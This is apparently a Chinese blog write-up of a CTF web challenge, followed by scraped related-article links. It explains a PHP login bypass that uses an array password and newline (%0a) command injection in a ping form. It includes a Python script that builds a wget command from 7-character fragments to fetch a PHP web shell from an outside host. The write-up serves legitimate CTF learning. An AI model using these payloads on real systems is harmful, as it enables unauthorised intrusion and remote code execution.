昨天晚上6点开始的HBCTF,虽然是针对小白的,但有些题目确实不简单。

昨天女朋友又让我帮她装DOTA2(女票是一个不怎么用电脑的),然后又有一个小白问我题目,我也很热情的告诉她了,哎,真耗不起。

言归正传:

————————————————————————————————我是分割线———————————————————————————————————————————————————————

对于那道200分的Web题真是难得有水平。

function d_addslashes($array){

    foreach($array as $key=>$value){

        if(!is_array($value)){

              !get_magic_quotes_gpc()&&$value=addslashes($value);

              $array[$key]=$value;

        }else{

          $array[$key]=d_addslashes($array[$key]);

        }

    }

    return $array;

}

$_POST = d_addslashes($_POST);

$_GET =  d_addslashes($_GET);

首先发现有备份文件  index.php.bak  下载下来,进行审计;发现有伪全局过滤,注入就别想了.再继续往下看,这里存在一个逻辑漏洞:

$username =isset($_POST['username'])?$_POST['username']:die();

$password = isset($_POST['password'])?md5($_POST['password']):die();

$sql="select password from users  where username='$username'";

$result = $conn->query($sql);

if(!$result){

    die('<script>alert("用户名或密码错误!!")</script>');

}

$row = $result->fetch_assoc();

if($row[0] === $password){

    $_SESSION['username']=$username;

    $_SESSION['status']=1;

    header("Location:./ping.php");

}else{

   die("<script>alert('用户名或密码错误!!')</script>");

}

关键点在这里:

if(!$result){

    die('<script>alert("用户名或密码错误!!")</script>');

}

即便是我们输入一个不存在的用户,这if也永远不会被执行,因为 $db->query($sql) 返回的是一个mysql resource类型,始终不可能为空. 你可以用

var_dump($result)

试一下.

接下来就考察对php的熟悉程度了

$row[0] === $password

如果我们输入了一个不存在的用户名,那么$row[0] 是等于 NULL的,但是 md5($array) 也是返回 NULL,所以只需要让password是一个数组,就可以绕过这里

所以最终用户名密码为:

username=1&password[]=1

绕过登陆之后,发现可以执行ping命令,经过测试发现:

1. ip 必须是 x.x.x.x 的格式, x 代表 1-3个数字

2. ip长度必须大于等于7,小于等于15,否则都会返回ip格式错误

3. 可以使用这样格式的ip: x.x.x.x[任意字符]

当 ip为ip=0.0.0.1||2时,返回 PING 0.0.0.12 (0.0.0.12): 56 data bytes

说明了|| 被替换为空了,同样道理,你可以发现&,$,(),;`,都被替换为了空

最后发现 %0a没有被过滤:

测试:ip=0.0.0.1%0als -al,返回如下,说明ls已经成功执行.

PING 0.0.0.1 (0.0.0.1): 56 data bytes

total 8

drwxr-xr-x 2 www-data www-data 4096 Apr  7 04:54 .

drwxr-xr-x 5 www-data www-data 4096 Apr  7 04:54 ..

测试:ip=0.0.0.1%0apwd,返回了当前的绝对路径:

PING 0.0.0.1 (0.0.0.1): 56 data bytes

/usr/share/nginx/html/sandBox/10.36.101.50

发现只有七个字符的可控输入空间,就是7个字符的命令执行啦,参考这篇文章http://wonderkun.cc/index.html/?p=524

下面给出python的payload吧:

#!/usr/bin/python

#-*- coding: utf-8 -*- 

import requests

def GetShell():

    url = "http://vctf.ctftools.com/ping.php"

    header = {

        "Cookie":"PHPSESSID=5rfro3re8253tv5f6fp5kd74l6",

        "Content-Type":"application/x-www-form-urlencoded"

    }

    #fileNames = ["1.php","-O\ \\","cn\ \\","\ a.\\","wget\\"]

    # linux创建中间有空格的文件名,需要转义,所以有请求"cn\ \\"

    # 可以修改hosts文件,让a.cn指向一个自己的服务器。

    # 在a.cn 的根目录下创建index.html ,内容是一个php shell

    '''

    wget\\

    \ wo\\

    nd\\

    er\\

    ku\\

    n.\\

    cc\ \\

    -O\ \\

    1.php

    '''

    fileNames = ["1.php","-O\ \\\\","cc\ \\\\","n.\\\\","ku\\\\","er\\\\","nd\\\\","\ wo\\\\","wget\\\\"]

    ip = "0.0.0.1%0a"

    for fileName in fileNames:

        createFileIp = ip+">"+fileName

        print createFileIp

        data="ip="+createFileIp

        requests.post(url,data=data,headers=header)

    proxy = {"http":"127.0.0.1:8080"}

    getShIp = ip + "ls%20-t>1"

    print getShIp

    data="ip="+getShIp

    requests.post(url,data=data,headers=header,proxies=proxy)

    getShellIp = ip + "sh%201"

    print getShellIp

    data="ip="+getShellIp

    requests.post(url,data=data,headers=header,proxies=proxy)

    shellUrl = "http://vctf.ctftools.com/sandBox/10.25.159.132/1.php"    #10.25.159.132为自己IP

    response = requests.get(shellUrl)

    if response.status_code == 200:

        print "[*] Get shell !"

    else :

        print "[*] fail!"

if __name__ == "__main__":

    GetShell()

拿到shell之后,连接本地的数据库,获取flag

谢谢,第一次写博客,大牛们勿喷。谢谢,以后会继续努力,发一些干货。

关于第一场HBCTF的Web题小分享,当作自身的笔记的更多相关文章

  1. 2017 计蒜之道 初赛 第一场 A、B题

    A题 阿里的新游戏 题目概述: 阿里九游开放平台近日上架了一款新的益智类游戏——成三棋.成三棋是我国非常古老的一个双人棋类游戏,其棋盘如下图所示: 成三棋的棋盘上有很多条线段,只能在线段交叉点上放入棋 ...

  2. 江西财经大学第一届程序设计竞赛 G题 小Q的口袋校园

    链接:https://www.nowcoder.com/acm/contest/115/G来源:牛客网 时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 32768K,其他语言65536 ...

  3. Different Integers 牛客多校第一场只会签到题

    Given a sequence of integers a1, a2, ..., an and q pairs of integers (l1, r1), (l2, r2), ..., (lq, r ...

  4. 线段树优化dp——牛客多校第一场I(好题)

    和两天做了两道数据结构优化dp的题,套路还是差不多的 题解链接! https://www.cnblogs.com/kls123/p/11221471.html 一些补充 其实这道题的dp[i]维护的不 ...

  5. 牛客网暑期ACM多校训练营(第一场)菜鸟补题QAQ

    签到题 J Different Integers(树状数组) 题目大意:给一个长为n的数组,每一个询问给两个数字i, j ,询问1~i, j~n这两个区间中有多少不同的数字,真的像是莫队裸题,但是两个 ...

  6. 【求出所有最短路+最小割】【多校第一场】【G题】

    题意 A从1要追在N的 B 只能走最短的路 问B最少切断多少条路可以让A不能过来 问B最多切断多少条路A还是能过来 对于1 求出1到N的所有最短路的路径,对其求最小割 对于2 求出长度最小的最短路即可 ...

  7. 校省选赛第一场A题Cinema题解

    今天是学校省选的第一场比赛,0战绩收工,死死啃着A题来做,偏偏一直WA在TES1. 赛后,才发现,原来要freopen("input.txt","r",stdi ...

  8. hdu 5288||2015多校联合第一场1001题

    pid=5288">http://acm.hdu.edu.cn/showproblem.php?pid=5288 Problem Description OO has got a ar ...

  9. 2019年牛客多校第一场B题Integration 数学

    2019年牛客多校第一场B题 Integration 题意 给出一个公式,求值 思路 明显的化简公式题,公式是分母连乘形式,这个时候要想到拆分,那如何拆分母呢,自然是裂项,此时有很多项裂项,我们不妨从 ...

随机推荐

  1. docker-compose管理daocker

    Docker-compose管理docker服务 1.安装docker-compose @首先确保服务器上已经安装docker环境,如果没有安装使用如下命令进行安装: # yum  -y  insta ...

  2. 用java实现一个简易编译器1-词法解析入门

    本文对应代码下载地址为: http://download.csdn.net/detail/tyler_download/9435103 视频地址: http://v.youku.com/v_show/ ...

  3. C#中解决Response.AddHeader("Content-Disposition", "attachment; filename=" + filename)下载文件时文件名乱码的问题

    问题:下载文件时文件名乱码怎么解决? 在C#写后台代码过程中,经常遇到下载文件出现文件名乱码的问题,在网上找了很多方法,总是存在浏览器不兼容的问题,当IE浏览器不乱码时,火狐浏览器就会乱码,后来经过反 ...

  4. 使用T4Scaffolding 创建自己的代码生成

    nuget查找引入T4Scaffolding.Core 这个是最低层的,没有其他依赖,当然也没有现成的模板 这个有对EF的依赖,自带了生成DBContext的模板   这个自带了一些mvc的contr ...

  5. Oracle表闪回功能

    1.启用表闪回首先要在表上支持行移动(在数据字典中设置标识来标识该操作可能会改变行ID,即同一条数据闪回成功后主键都一样,但行ID其实已经发生变化了) SQL> alter table base ...

  6. spring cloud 服务发现

    Eureka 当注册中心使用. 注: 1.当仅有一台Eureka时,不需要向别的节点注册. 2.集群的时候,需要相互注册. 工作方式: 前提: Eureka    //注册中心 provide1  / ...

  7. 使用CSS3改变文本选中的默认颜色——张鑫旭

    关于浏览器文字选中颜色 以我的系统举例(xp 默认主题),浏览器上页面文字选中后默认的背景色是一种蓝色, 不同浏览器的颜色有些许差异,但大致相同,文字颜色也近乎白色,如下图所示,截自Firefox3. ...

  8. HTML5 Form Data 对象的使用

    HTML5 Form Data 对象的使用  MDN: https://developer.mozilla.org/zh-CN/docs/Web/Guide/Using_FormData_Object ...

  9. 洛谷P4027 [NOI2007]货币兑换(dp 斜率优化 cdq 二分)

    题意 题目链接 Sol 解题的关键是看到题目里的提示... 设\(f[i]\)表示到第\(i\)天所持有软妹币的最大数量,显然答案为\(max_{i = 1}^n f[i]\) 转移为\(f_i = ...

  10. javascript之原型

    写作背景 最近在抓基础,毕竟没有好地基盖楼容易塌啊...再回首javascript,原型可以说是该语言较为核心的设计之一,我们有必要了解下其设计理念 (#^.^#) 基本概念 MyObject.pro ...